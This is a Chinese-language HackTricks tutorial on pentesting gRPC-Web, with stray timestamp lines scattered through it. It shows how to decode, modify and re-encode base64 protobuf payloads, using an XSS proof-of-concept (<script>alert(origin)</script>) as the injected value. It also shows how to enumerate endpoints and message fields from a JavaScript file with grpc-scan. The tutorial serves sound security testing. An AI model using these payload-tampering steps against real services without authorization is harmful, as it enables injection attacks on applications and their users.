2024-07-19 10:11:43 +00:00
|
|
|
|
# Pentesting gRPC-Web
|
2023-12-24 19:03:58 +00:00
|
|
|
|
|
2024-07-19 10:11:43 +00:00
|
|
|
|
{% hint style="success" %}
|
|
|
|
|
|
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
|
|
|
|
|
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
2023-12-24 19:03:58 +00:00
|
|
|
|
|
2024-07-19 10:11:43 +00:00
|
|
|
|
<details>
|
2023-12-24 19:03:58 +00:00
|
|
|
|
|
2024-07-19 10:11:43 +00:00
|
|
|
|
<summary>支持 HackTricks</summary>
|
2024-02-09 08:09:21 +00:00
|
|
|
|
|
2024-07-19 10:11:43 +00:00
|
|
|
|
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
|
|
|
|
|
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
|
|
|
|
|
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
|
2023-12-24 19:03:58 +00:00
|
|
|
|
|
|
|
|
|
|
</details>
|
2024-07-19 10:11:43 +00:00
|
|
|
|
{% endhint %}
|
2023-12-24 19:03:58 +00:00
|
|
|
|
|
2024-07-19 10:11:43 +00:00
|
|
|
|
## **操纵 gRPC-Web 负载**
|
|
|
|
|
|
gRPC-Web 在请求中使用 Content-Type: `application/grpc-web-text`,这是一种以 base64 编码形式的 protobuf,您可以使用 [gprc-coder](https://github.com/nxenon/grpc-pentest-suite) 工具,也可以安装其 [Burp Suite 扩展](https://github.com/nxenon/grpc-pentest-suite)。
|
2023-12-24 19:03:58 +00:00
|
|
|
|
|
2024-07-19 10:11:43 +00:00
|
|
|
|
### **使用 gGRPC Coder 工具手动操作**
|
2023-12-24 19:03:58 +00:00
|
|
|
|
1. 首先解码负载:
|
|
|
|
|
|
```bash
|
|
|
|
|
|
echo "AAAAABYSC0FtaW4gTmFzaXJpGDY6BVhlbm9u" | python3 grpc-coder.py --decode --type grpc-web-text | protoscope > out.txt
|
|
|
|
|
|
```
|
2024-07-19 10:11:43 +00:00
|
|
|
|
2. 编辑解码负载的内容
|
2023-12-24 19:03:58 +00:00
|
|
|
|
```
|
|
|
|
|
|
nano out.txt
|
|
|
|
|
|
2: {"Amin Nasiri Xenon GRPC"}
|
|
|
|
|
|
3: 54
|
|
|
|
|
|
7: {"<script>alert(origin)</script>"}
|
|
|
|
|
|
```
|
2024-07-19 10:11:43 +00:00
|
|
|
|
3. 编码新的有效负载
|
2023-12-24 19:03:58 +00:00
|
|
|
|
```bash
|
|
|
|
|
|
protoscope -s out.txt | python3 grpc-coder.py --encode --type grpc-web-text
|
|
|
|
|
|
```
|
2024-02-09 08:09:21 +00:00
|
|
|
|
4. 在Burp拦截器中使用输出:
|
2023-12-24 19:03:58 +00:00
|
|
|
|
```
|
|
|
|
|
|
AAAAADoSFkFtaW4gTmFzaXJpIFhlbm9uIEdSUEMYNjoePHNjcmlwdD5hbGVydChvcmlnaW4pPC9zY3JpcHQ+
|
|
|
|
|
|
```
|
2024-02-09 08:09:21 +00:00
|
|
|
|
### **使用 gRPC-Web Coder Burp Suite 扩展的手册**
|
2024-07-19 10:11:43 +00:00
|
|
|
|
您可以在 [gRPC-Web Pentest Suite](https://github.com/nxenon/grpc-pentest-suite) 中使用 gRPC-Web Coder Burp Suite 扩展,这样更简单。您可以在其仓库中阅读安装和使用说明。
|
2023-12-24 19:03:58 +00:00
|
|
|
|
|
2024-07-19 10:11:43 +00:00
|
|
|
|
## **分析 gRPC-Web Javascript 文件**
|
|
|
|
|
|
每个 gRPC-Web 应用程序中至少有一个 Javascript 文件。您可以分析该文件以查找新的消息、端点和服务。尝试使用 [gRPC-Scan](https://github.com/nxenon/grpc-pentest-suite) 工具。
|
|
|
|
|
|
1. 下载 Javascript gRPC-Web 文件
|
|
|
|
|
|
2. 使用 grpc-scan.py 扫描它:
|
2023-12-24 19:03:58 +00:00
|
|
|
|
```bash
|
|
|
|
|
|
python3 grpc-scan.py --file main.js
|
|
|
|
|
|
```
|
2024-07-19 10:11:43 +00:00
|
|
|
|
3. 分析输出并测试新的端点和新服务:
|
2023-12-24 19:03:58 +00:00
|
|
|
|
```
|
|
|
|
|
|
Output:
|
|
|
|
|
|
Found Endpoints:
|
|
|
|
|
|
/grpc.gateway.testing.EchoService/Echo
|
|
|
|
|
|
/grpc.gateway.testing.EchoService/EchoAbort
|
|
|
|
|
|
/grpc.gateway.testing.EchoService/NoOp
|
|
|
|
|
|
/grpc.gateway.testing.EchoService/ServerStreamingEcho
|
|
|
|
|
|
/grpc.gateway.testing.EchoService/ServerStreamingEchoAbort
|
|
|
|
|
|
|
|
|
|
|
|
Found Messages:
|
|
|
|
|
|
|
|
|
|
|
|
grpc.gateway.testing.EchoRequest:
|
|
|
|
|
|
+------------+--------------------+--------------+
|
|
|
|
|
|
| Field Name | Field Type | Field Number |
|
|
|
|
|
|
+============+====================+==============+
|
|
|
|
|
|
| Message | Proto3StringField | 1 |
|
|
|
|
|
|
+------------+--------------------+--------------+
|
|
|
|
|
|
| Name | Proto3StringField | 2 |
|
|
|
|
|
|
+------------+--------------------+--------------+
|
|
|
|
|
|
| Age | Proto3IntField | 3 |
|
|
|
|
|
|
+------------+--------------------+--------------+
|
|
|
|
|
|
| IsAdmin | Proto3BooleanField | 4 |
|
|
|
|
|
|
+------------+--------------------+--------------+
|
|
|
|
|
|
| Weight | Proto3FloatField | 5 |
|
|
|
|
|
|
+------------+--------------------+--------------+
|
|
|
|
|
|
| Test | Proto3StringField | 6 |
|
|
|
|
|
|
+------------+--------------------+--------------+
|
|
|
|
|
|
| Test2 | Proto3StringField | 7 |
|
|
|
|
|
|
+------------+--------------------+--------------+
|
|
|
|
|
|
| Test3 | Proto3StringField | 16 |
|
|
|
|
|
|
+------------+--------------------+--------------+
|
|
|
|
|
|
| Test4 | Proto3StringField | 20 |
|
|
|
|
|
|
+------------+--------------------+--------------+
|
|
|
|
|
|
|
|
|
|
|
|
grpc.gateway.testing.EchoResponse:
|
|
|
|
|
|
+--------------+--------------------+--------------+
|
|
|
|
|
|
| Field Name | Field Type | Field Number |
|
|
|
|
|
|
+==============+====================+==============+
|
|
|
|
|
|
| Message | Proto3StringField | 1 |
|
|
|
|
|
|
+--------------+--------------------+--------------+
|
|
|
|
|
|
| Name | Proto3StringField | 2 |
|
|
|
|
|
|
+--------------+--------------------+--------------+
|
|
|
|
|
|
| Age | Proto3IntField | 3 |
|
|
|
|
|
|
+--------------+--------------------+--------------+
|
|
|
|
|
|
| IsAdmin | Proto3BooleanField | 4 |
|
|
|
|
|
|
+--------------+--------------------+--------------+
|
|
|
|
|
|
| Weight | Proto3FloatField | 5 |
|
|
|
|
|
|
+--------------+--------------------+--------------+
|
|
|
|
|
|
| Test | Proto3StringField | 6 |
|
|
|
|
|
|
+--------------+--------------------+--------------+
|
|
|
|
|
|
| Test2 | Proto3StringField | 7 |
|
|
|
|
|
|
+--------------+--------------------+--------------+
|
|
|
|
|
|
| Test3 | Proto3StringField | 16 |
|
|
|
|
|
|
+--------------+--------------------+--------------+
|
|
|
|
|
|
| Test4 | Proto3StringField | 20 |
|
|
|
|
|
|
+--------------+--------------------+--------------+
|
|
|
|
|
|
| MessageCount | Proto3IntField | 8 |
|
|
|
|
|
|
+--------------+--------------------+--------------+
|
|
|
|
|
|
|
|
|
|
|
|
grpc.gateway.testing.ServerStreamingEchoRequest:
|
|
|
|
|
|
+-----------------+-------------------+--------------+
|
|
|
|
|
|
| Field Name | Field Type | Field Number |
|
|
|
|
|
|
+=================+===================+==============+
|
|
|
|
|
|
| Message | Proto3StringField | 1 |
|
|
|
|
|
|
+-----------------+-------------------+--------------+
|
|
|
|
|
|
| MessageCount | Proto3IntField | 2 |
|
|
|
|
|
|
+-----------------+-------------------+--------------+
|
|
|
|
|
|
| MessageInterval | Proto3IntField | 3 |
|
|
|
|
|
|
+-----------------+-------------------+--------------+
|
|
|
|
|
|
|
|
|
|
|
|
grpc.gateway.testing.ServerStreamingEchoResponse:
|
|
|
|
|
|
+------------+-------------------+--------------+
|
|
|
|
|
|
| Field Name | Field Type | Field Number |
|
|
|
|
|
|
+============+===================+==============+
|
|
|
|
|
|
| Message | Proto3StringField | 1 |
|
|
|
|
|
|
+------------+-------------------+--------------+
|
|
|
|
|
|
|
|
|
|
|
|
grpc.gateway.testing.ClientStreamingEchoRequest:
|
|
|
|
|
|
+------------+-------------------+--------------+
|
|
|
|
|
|
| Field Name | Field Type | Field Number |
|
|
|
|
|
|
+============+===================+==============+
|
|
|
|
|
|
| Message | Proto3StringField | 1 |
|
|
|
|
|
|
+------------+-------------------+--------------+
|
|
|
|
|
|
|
|
|
|
|
|
grpc.gateway.testing.ClientStreamingEchoResponse:
|
|
|
|
|
|
+--------------+----------------+--------------+
|
|
|
|
|
|
| Field Name | Field Type | Field Number |
|
|
|
|
|
|
+==============+================+==============+
|
|
|
|
|
|
| MessageCount | Proto3IntField | 1 |
|
|
|
|
|
|
+--------------+----------------+--------------+
|
|
|
|
|
|
```
|
2024-07-19 10:11:43 +00:00
|
|
|
|
## 参考文献
|
2023-12-24 19:03:58 +00:00
|
|
|
|
|
2024-07-19 10:11:43 +00:00
|
|
|
|
* [Amin Nasiri 的 gRPC-Web 黑客文章](https://infosecwriteups.com/hacking-into-grpc-web-a54053757a45)
|
2024-02-09 08:09:21 +00:00
|
|
|
|
* [gRPC-Web 渗透测试套件](https://github.com/nxenon/grpc-pentest-suite)
|
2023-12-24 19:03:58 +00:00
|
|
|
|
|
2024-07-19 10:11:43 +00:00
|
|
|
|
{% hint style="success" %}
|
|
|
|
|
|
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
|
|
|
|
|
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
2023-12-24 19:03:58 +00:00
|
|
|
|
|
2024-07-19 10:11:43 +00:00
|
|
|
|
<details>
|
2024-02-09 08:09:21 +00:00
|
|
|
|
|
2024-07-19 10:11:43 +00:00
|
|
|
|
<summary>支持 HackTricks</summary>
|
2023-12-24 19:03:58 +00:00
|
|
|
|
|
2024-07-19 10:11:43 +00:00
|
|
|
|
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
|
|
|
|
|
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们。**
|
|
|
|
|
|
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
|
2023-12-24 19:03:58 +00:00
|
|
|
|
|
|
|
|
|
|
</details>
|
2024-07-19 10:11:43 +00:00
|
|
|
|
{% endhint %}
|
